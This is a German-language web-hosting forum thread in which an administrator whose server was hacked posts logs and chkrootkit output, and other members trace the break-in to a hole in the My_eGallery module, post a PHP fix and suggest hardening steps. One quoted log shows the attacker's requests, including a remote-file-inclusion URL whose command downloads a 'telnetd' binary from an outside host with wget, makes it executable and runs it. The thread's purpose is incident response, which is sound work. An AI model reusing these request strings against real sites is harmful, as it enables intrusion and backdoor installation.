66.196.65.35 - - [24/Dec/2003:09:27:16 +0100] "GET /robots.txt HTTP/1.0" 200 220
66.196.72.103 - - [24/Dec/2003:09:31:08 +0100] "GET /index.php?module=PostCalendar&func=view&tplview=&viewtype=day&Date=20030922&pc_username=&pc_category=&pc_topic=&print= HTTP/1.0" 200 26651
66.196.72.108 - - [24/Dec/2003:09:40:53 +0100] "GET /index.php?module=My_eGallery&do=showpic&pid=41 HTTP/1.0" 200 21572
80.138.10.99 - - [24/Dec/2003:11:04:30 +0100] "GET / HTTP/1.1" 200 6
Last edited by bernard on 2004-01-01 17:01, edited 1 time in total.

bernard
Posts: 45
Joined: 2002-12-24 18:52

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by bernard » 2003-12-31 12:54

Welche Configs sind am wichtigsten ? Welche soll ich posten ?

evoluzzer
Posts: 90
Joined: 2002-09-08 19:33
Location: www.internetists.de/index.php?s=14

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by evoluzzer » 2003-12-31 13:11

so auf den ersten Blick: kamen die über myGallery rein, die älteren Versionen waren ein bisschen buggy....

bernard
Posts: 45
Joined: 2002-12-24 18:52

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by bernard » 2003-12-31 13:15

rescue:/tmp/chkrootkit-0.43# ./chkrootkit
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not infected
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected
Checking `ifconfig'... not infected
Checking `inetd'... Error: /proc must be mounted
To mount /proc at boot you need an /etc/fstab line like:
/proc /proc proc defaults
In the meantime, mount /proc /proc -t proc
not tested
Checking `inetdconf'... not infected
Checking `identd'... not found
Checking `init'... not infected
Checking `killall'... not infected
Checking `ldsopreload'... not infected
Checking `login'... not infected
Checking `ls'... not infected
Checking `lsof'... not infected
Checking `mail'... not infected
Checking `mingetty'... not infected
Checking `netstat'... not infected
Checking `named'... not found
Checking `passwd'... not infected
Checking `pidof'... not infected
Checking `pop2'... not found
Checking `pop3'... not found
Checking `ps'... not infected
Checking `pstree'... not infected
Checking `rpcinfo'... not infected
Checking `rlogind'... not found
Checking `rshd'... not found
Checking `slogin'... not infected
Checking `sendmail'... not infected
Checking `sshd'... Error: /proc must be mounted
To mount /proc at boot you need an /etc/fstab line like:
/proc /proc proc defaults
In the meantime, mount /proc /proc -t proc
not infected
Checking `syslogd'... not infected
Checking `tar'... not infected
Checking `tcpd'... Error: /proc must be mounted
To mount /proc at boot you need an /etc/fstab line like:
/proc /proc proc defaults
In the meantime, mount /proc /proc -t proc
/usr/bin/strings: /usr/sbin/tcpd: No such file or directory
not infected
Checking `tcpdump'... not infected
Checking `top'... not infected
Checking `telnetd'... not found
Checking `timed'... not found
Checking `traceroute'... not infected
Checking `vdir'... not infected
Checking `w'... not infected
Checking `write'... not infected
Checking `aliens'... no suspect files
Searching for sniffer's logs, it may take a while... nothing found
Searching for HiDrootkit's default dir... nothing found
Searching for t0rn's default files and dirs... nothing found
Searching for t0rn's v8 defaults... nothing found
Searching for Lion Worm default files and dirs... nothing found
Searching for RSHA's default files and dir... nothing found
Searching for RH-Sharpe's default files... nothing found
Searching for Ambient's rootkit (ark) default files and dirs... nothing found
Searching for suspicious files and dirs, it may take a while...
/usr/lib/perl5/5.8.0/i586-linux-thread-multi/.packlist /usr/lib/perl5/5.8.0/i586-linux-thread-multi/auto/ExtUtils/MakeMaker/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/DBI/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/Data/ShowTable/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/Msql-Mysql-modules/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/SNMP/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/Compress/Zlib/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/Digest/SHA1/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/Digest/HMAC/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/HTML/Tagset/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/HTML/Parser/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/IO-stringy/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/Mail/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/Mail/Sender/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/Mail/POP3Client/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/Mail/SpamAssassin/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/URI/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/MIME-tools/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/Net/DNS/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/Net/Server/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/libwww-perl/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/Quota/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/Logfile/Rotate/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/Proc/ProcessTable/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/Term/ReadKey/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/Unix/Syslog/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/Archive/Tar/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/Archive/Zip/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/Convert/TNEF/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux-thread-multi/auto/Convert/UUlib/.packlist

Searching for LPD Worm files and dirs... nothing found
Searching for Ramen Worm files and dirs... nothing found
Searching for Maniac files and dirs... nothing found
Searching for RK17 files and dirs... nothing found
Searching for Ducoci rootkit... nothing found
Searching for Adore Worm... nothing found
Searching for ShitC Worm... nothing found
Searching for Omega Worm... nothing found
Searching for Sadmind/IIS Worm... nothing found
Searching for MonKit... nothing found
Searching for Showtee... nothing found
Searching for OpticKit... nothing found
Searching for T.R.K... nothing found
Searching for Mithra... nothing found
Searching for OBSD rk v1... nothing found
Searching for LOC rootkit ... nothing found
Searching for Romanian rootkit ... nothing found
Searching for Suckit rootkit ... nothing found
Searching for Volc rootkit ... nothing found
Searching for Gold2 rootkit ... nothing found
Searching for TC2 Worm default files and dirs... nothing found
Searching for Anonoying rootkit default files and dirs... nothing found
Searching for ZK rootkit default files and dirs... nothing found
Searching for ShKit rootkit default files and dirs... nothing found
Searching for AjaKit rootkit default files and dirs... nothing found
Searching for zaRwT rootkit default files and dirs... nothing found
Searching for anomalies in shell history files... nothing found
Checking `asp'... not infected
Checking `bindshell'... not infected
Checking `lkm'... Error: /proc must be mounted
To mount /proc at boot you need an /etc/fstab line like:
/proc /proc proc defaults
In the meantime, mount /proc /proc -t proc
OooPS!
Warning: Possible LKM Trojan installed


Checking `rexedcs'... not found
Checking `sniffer'... eth0: not promisc and no PF_PACKET sockets
Checking `w55808'... not infected
Checking `wted'... unable to open wtmp-file wtmpChecking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'... not tested: not found wtmp and/or lastlog filerescue:/tmp/chkrootkit-0.43#

bernard
Posts: 45
Joined: 2002-12-24 18:52

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by bernard » 2003-12-31 13:16

Also jetzt Dateien sichern und neu aufsetzen ?

evoluzzer
Posts: 90
Joined: 2002-09-08 19:33
Location: www.internetists.de/index.php?s=14

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by evoluzzer » 2003-12-31 13:23

wie würde Paul Panzer sagen: RICHTICH!!!

bernard
Posts: 45
Joined: 2002-12-24 18:52

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by bernard » 2003-12-31 13:25

Ich verstehe aber nicht wie das funktioniert !? Wie sind die an Kennwörter rangekommen für die wget und telnetd Verbindung?

captaincrunch
Userprojekt
Userprojekt
Posts: 7225
Joined: 2002-10-09 14:30
Location: Dorsten

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by captaincrunch » 2003-12-31 13:28

Wie bereits gesagt über unsicher konfigurierte und schlampig programmierte Software (xamp inkl. *nuke* / eGallery)
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc

static
Posts: 437
Joined: 2002-10-27 19:56
Location: Schweiz

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by static » 2003-12-31 13:28

Bernard wrote: Also jetzt Dateien sichern und neu aufsetzen ?
Jep und My_eGallery nicht mehr installieren (oder wenn es eine gefixte Version gibt, diese nehmen), denn dadurch ist er imo reingekommen.
Bernard wrote: [...]
200.158.98.178 - - [24/Dec/2003:03:22:32 +0100] "GET /modules/My_eGallery/public/displayCategory.php?
basepath=http://www.jesusaleluia.iwebland.com/dc ... me%20-a;id HTTP/1.1" 200 3636
200.158.98.178 - - [24/Dec/2003:03:22:42 +0100] "GET /modules/My_eGallery/public/displayCategory.php?
basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?&cmd=id HTTP/1.1" 200 3282
200.158.98.178 - - [24/Dec/2003:03:22:57 +0100] "GET /modules/My_eGallery/public/displayCategory.php?
basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?
&cmd=cd%20/tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd;chmod%20777%20telnetd;./telnetd HTTP/1.1" 200 3063
[...]
so long
static

lufthansen
Posts: 390
Joined: 2002-09-24 17:31
Location: NRW

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by lufthansen » 2003-12-31 15:45

sowas bestätigt mich immer wieder in meiner relativ harten config ...
auch wenn meine user mich für paranoid halten =)
den ich bin es ja nacher der das alles wieder fixen muss

alexander newald
Posts: 1117
Joined: 2002-09-27 00:54
Location: Hannover

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by alexander newald » 2003-12-31 17:30

Kann mal einer die Logeinträge passend kürzen, damit man nicht bald in den Suchmaschienen eine Anleitung findet, wie man eine Schwachstelle ausnutzt....

dodolin
RSAC
Posts: 4009
Joined: 2003-01-21 01:59
Location: Sinsheim/Karlsruhe

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by dodolin » 2003-12-31 17:33

@Alexander: Das ist doch ein Kinderspiel, oder?
http://www.google.de/search?q=My_eGallery+exploit ;)

jtb
Posts: 599
Joined: 2002-08-18 16:41
Location: Darmstadt

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by jtb » 2003-12-31 17:33


alexander newald
Posts: 1117
Joined: 2002-09-27 00:54
Location: Hannover

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by alexander newald » 2003-12-31 17:44

Ja, aber müssen dann evtl auch Beiträge aus dem Rootforum mit in der Liste erscheinen? Oder sind beim rootforum.org/ keine Bots erlaubt? Mich persönlich würde das halt stören (wenn es mein eigenes Forum wäre)

jubilee
Posts: 9
Joined: 2002-12-06 13:51

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by jubilee » 2004-01-01 15:20

Howdi !
Fix für das Scheunentor in der My_eGallery ab Version 2.7.9
(und davon abgeleitete Versionen 4nAlbum etc...)
in diesen Dateien :

modules/My_eGallery/public/displayCategory.php
modules/My_eGallery/public/displayMedia.php
modules/My_eGallery/public/mainGallery.php
admin/modules/gallery/settings.php

oben in den Dateien jeweils diesen Code hinzufügen:

if( isset($_GET['basepath']) || isset($_GET['adminpath']) )
{
Header("Location: index.php");
die();
}

Damit sollte zumindest dieses Loch gestopft sein.
MfG
jubilee

bernard
Posts: 45
Joined: 2002-12-24 18:52

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by bernard » 2004-01-01 17:05

Vielen Dank Leute ! Dieses Forum ist echt eine super Sache ! Ihr wart mir echt eine grosse Hilfe. Wieder viel gelernt.
sowas bestätigt mich immer wieder in meiner relativ harten config ...
auch wenn meine user mich für paranoid halten =)
den ich bin es ja nacher der das alles wieder fixen muss
@Lufthansen mit welcher config hätte ich dies (trotz fehlerhafter E-Gallery) verhindern können ? Hast Du da einen Tip ?

@jubilee thx für den Tip !

alexander newald
Posts: 1117
Joined: 2002-09-27 00:54
Location: Hannover

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by alexander newald » 2004-01-01 17:17

Kein gcc, wget, links, lynx auf dem Server (bzw. für Benutzer mit Webspace keine Zugriffsberechtigung)

PHP als CGI und suexec und safemode, perl mit suexec

lufthansen
Posts: 390
Joined: 2002-09-24 17:31
Location: NRW

Re: Brauche dringend Hilfe ! Bin gehackt worden

Post by lufthansen » 2004-01-01 17:17

suphp shell commands verbieten grsecurity und up2daten kernel ...
und dir wäre das glaube ich nicht passiert ..